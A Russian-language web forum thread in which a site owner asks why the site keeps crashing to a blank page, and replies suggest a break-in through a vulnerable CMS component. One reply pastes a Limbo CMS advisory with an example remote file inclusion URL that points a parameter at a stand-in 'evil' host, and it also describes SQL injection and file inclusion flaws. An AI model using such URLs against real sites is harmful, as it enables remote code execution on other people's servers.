Подскажите пожалуйста
Вообщем проблема том, что у меня уже второй раз вылетает сайт. Первый раз вылетел позавчера вечером, но вчера я его восстановил, но спустя 3 часа он опять также вылетел. Когда вылетает, то появляется пустая страница, ее можете прямо сейчас посмотреть т.к. с вчерашнего вылета еще не восстанавливал.
Кто разбирается, подскажите, пожалуйста, в чем может быть проблема. Заранее все благодарен!
Ш
ШУМный
скорее всего ломают через какой-то установленный компонент. форум с дырами например.
D
Dagger
в логах посмотреть
скорее всего ломают через какой-то установленный компонент. форум с дырами например.
Как это проверить можно?
меняй нафиг движок))
дырявый етот лимбо CMS))
Программа: Limbo CMS event module
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «lm_absolute_path» сценарием mod_eventcal.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil
дырявый етот лимбо CMS))
Программа: Limbo CMS event module
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «lm_absolute_path» сценарием mod_eventcal.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://www.[target].com/[script_path]/eventcal/mod_eventcal.php?lm_absolute_path=http://evil
Описание:
Уязвимость позволяет удаленному пользователю подключить и выполнить локальные PHP файлы и произвести SQL-инъекцию.
1. Уязвимость существует из-за недостаточной обработки входных данных в массиве "_SERVER[]" при выключенной опции register_globals. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "option" сценария "index2.php". Удаленный пользователь может выполнить произвольный PHP файл на системе.
Решение: Установите исправление с сайта производителя.
Уязвимость позволяет удаленному пользователю подключить и выполнить локальные PHP файлы и произвести SQL-инъекцию.
1. Уязвимость существует из-за недостаточной обработки входных данных в массиве "_SERVER[]" при выключенной опции register_globals. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "option" сценария "index2.php". Удаленный пользователь может выполнить произвольный PHP файл на системе.
Решение: Установите исправление с сайта производителя.
У
УРфин Джюс™
у меня такая же проблема. пол часа назад е1 вылетел, а потом не загружался. Звонил в техподдержку, но они там тупые как валенки, даже разговаривать внятно не могут - обкуреные чтоли
по теме ОФФ, может в другом форуме лучше?
у меня такая же проблема. пол часа назад е1 вылетел, а потом не загружался. Звонил в техподдержку, но они там тупые как валенки, даже разговаривать внятно не могут - обкуреные чтоли
дак частенько что то стало :-)
дак частенько что то стало :-)
М
Мофочка
не сталкивались
Обсуждение этой темы закрыто модератором форума.